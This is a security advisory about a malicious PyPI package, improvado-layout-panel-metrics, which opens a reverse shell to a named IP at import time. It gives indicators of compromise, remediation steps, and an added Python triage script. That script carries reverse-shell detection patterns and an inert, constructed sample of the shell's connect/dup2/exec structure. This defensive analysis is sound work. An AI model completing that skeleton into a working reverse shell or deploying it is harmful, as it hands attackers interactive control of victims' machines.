Malicious package

improvado-layout-panel-metrics (PyPI)

Malicious code in improvado-layout-panel-metrics (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-6231
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
pip uninstall improvado-layout-panel-metrics

What this malware does

The package's top-level fluent_panel_metrics/__init__.py defines _bootstrap_runtime_profile() and unconditionally invokes it at import. The function opens a TCP socket to 34.69.137.236 on port 80 (falling back to 443), duplicates the socket onto file descriptors 0/1/2, and execs /bin/sh -i — a textbook reverse shell that hands interactive shell control to the operator of 34.69.137.236 on any machine that imports the package (directly or transitively). The advertised purpose (panel grid math) has no need for network I/O; the function name is cover. The PyPI distribution name 'improvado-layout-panel-metrics' impersonates the Improvado analytics vendor, while the actual top-level module is 'fluent_panel_metrics' and the README instructs pip install fluent-panel-metrics — a name/identity mismatch consistent with a lure targeting users searching for an Improvado integration.

During import, the package starts a reverse shell.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-acme-widget-layout-utils

Reasons (based on the campaign):

  • The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.

The OpenSSF Package Analysis project identified 'improvado-layout-panel-metrics' @ 0.1.1 (pypi) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.

Malicious versions

2 flagged
0.1.0, 0.1.1

Indicators of compromise (SHA-256)

5aeeeb45ef8a0d58b7679829291f01f8455c466a416fe3706e9d2042666a40de
45281220c3d37f2fbfa7f18d1d963443a5521d4d5c37614b0843202c32e8d528
36c4e74ac7bd28c4a5f7f943b6038586888b7c1d83f587a5ac52f43a48e09644
61cc6b0b5d5efe4675f4159e8bc8f6380970614c1dc36b553207fa73fa66104e
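The following is an added triage helper, not code from the advisory or from O3 Security. It shows three defender-side checks built from what the advisory states: matching pinned requirements against the flagged releases, hashing files under a directory against the published SHA-256 IoCs, and a static scan of a module's source for the building blocks of the import-time reverse shell described above (an outbound connect, dup2() onto the standard descriptors, and an exec-family call, all reachable from module scope). The two module sources and the requirements text are constructed samples; the suspicious one keeps the shape the advisory describes but references undefined names (REMOTE_ENDPOINT, SHELL_PATH), so it is inert.

```python
"""Offline triage helpers for the improvado-layout-panel-metrics advisory.
Added example; samples below are constructed, not the real package source."""
import ast
import hashlib
import re
from pathlib import Path

# Flagged releases and IoC hashes quoted from the advisory.
FLAGGED_RELEASES = {"improvado-layout-panel-metrics": {"0.1.0", "0.1.1"}}
KNOWN_BAD_SHA256 = {
    "5aeeeb45ef8a0d58b7679829291f01f8455c466a416fe3706e9d2042666a40de",
    "45281220c3d37f2fbfa7f18d1d963443a5521d4d5c37614b0843202c32e8d528",
    "36c4e74ac7bd28c4a5f7f943b6038586888b7c1d83f587a5ac52f43a48e09644",
    "61cc6b0b5d5efe4675f4159e8bc8f6380970614c1dc36b553207fa73fa66104e",
}
# Textual indicators; all three must appear in one import-time code path.
INDICATORS = {
    "connect": re.compile(r"\.connect\s*\("),
    "dup2": re.compile(r"\bdup2\s*\("),
    "exec": re.compile(r"\b(?:execv|execve|execl|execlp|execvp|execvpe|system|popen)\s*\("),
}

def normalize_name(name: str) -> str:
    """PEP 503 normalisation so 'Improvado_Layout.Panel-Metrics' still matches."""
    return re.sub(r"[-_.]+", "-", name).lower()

def is_flagged_release(name: str, version: str) -> bool:
    return version in FLAGGED_RELEASES.get(normalize_name(name), set())

_REQ_LINE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([^\s;#]+)")

def flagged_requirements(requirements_text: str) -> list[tuple[str, str]]:
    """(name, version) pins in a requirements/constraints file that are flagged."""
    hits = []
    for line in requirements_text.splitlines():
        m = _REQ_LINE.match(line)
        if m and is_flagged_release(m.group(1), m.group(2)):
            hits.append((normalize_name(m.group(1)), m.group(2)))
    return hits

def ioc_matches(root: Path) -> list[tuple[Path, str]]:
    """Walk a directory (e.g. site-packages) and report files whose SHA-256 is an IoC."""
    found = []
    for path in root.rglob("*"):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            if digest in KNOWN_BAD_SHA256:
                found.append((path, digest))
    return found

def _has_all_indicators(segment: str) -> bool:
    return all(rx.search(segment) for rx in INDICATORS.values())

def import_time_reverse_shell(source: str) -> list[str]:
    """Names of same-module functions called at module scope whose body carries all
    three indicators; '<module>' when the statements sit at module scope directly."""
    tree = ast.parse(source)
    funcs = {n.name: n for n in tree.body if isinstance(n, ast.FunctionDef)}
    hits: list[str] = []
    for stmt in tree.body:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef,
                             ast.Import, ast.ImportFrom)):
            continue  # definitions and imports do not run a payload by themselves
        if _has_all_indicators(ast.get_source_segment(source, stmt) or ""):
            hits.append("<module>")
            continue
        for node in ast.walk(stmt):  # follow direct calls made at import time
            if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                    and node.func.id in funcs and node.func.id not in hits):
                body = ast.get_source_segment(source, funcs[node.func.id]) or ""
                if _has_all_indicators(body):
                    hits.append(node.func.id)
    return hits

# Constructed samples. REMOTE_ENDPOINT and SHELL_PATH are deliberately undefined.
SAMPLE_SUSPICIOUS = '''
import os, socket

def _bootstrap_runtime_profile():
    s = socket.socket()
    s.connect(REMOTE_ENDPOINT)
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    os.execl(SHELL_PATH, "sh", "-i")

_bootstrap_runtime_profile()

def grid_columns(width, cell):
    return width // cell
'''
SAMPLE_BENIGN = '''
def grid_columns(width, cell):
    return width // cell

DEFAULT_COLUMNS = grid_columns(1200, 300)
'''
SAMPLE_REQUIREMENTS = """requests==2.31.0
Improvado_Layout.Panel-Metrics==0.1.1  # constructed pin
numpy==1.26.4
"""

if __name__ == "__main__":
    print(flagged_requirements(SAMPLE_REQUIREMENTS))
    print(import_time_reverse_shell(SAMPLE_SUSPICIOUS), import_time_reverse_shell(SAMPLE_BENIGN))
    print(ioc_matches(Path(".")))  # point at site-packages in a real triage
```

The static scan is a heuristic, not a substitute for the hash match: it only follows direct calls to functions defined in the same module, so indirection through other modules or string-built code would escape it, while a hit still deserves the same response the advisory prescribes (remove the package, rotate reachable secrets).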

Frequently asked questions

No. improvado-layout-panel-metrics on PyPI has been identified as a malicious package (versions 0.1.0, 0.1.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

2026-06-acme-widget-layout-utils
IN-MAL-2026-007090
IN-MAL-2026-007091

References

Credits

  • Amazon Inspector · finder
  • Kamil Mańkowski (kam193) · reporter
  • OpenSSF: Package Analysis · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

improvado-layout-panel-metrics (PyPI) malicious package — MAL-2026-6231 | O3 Security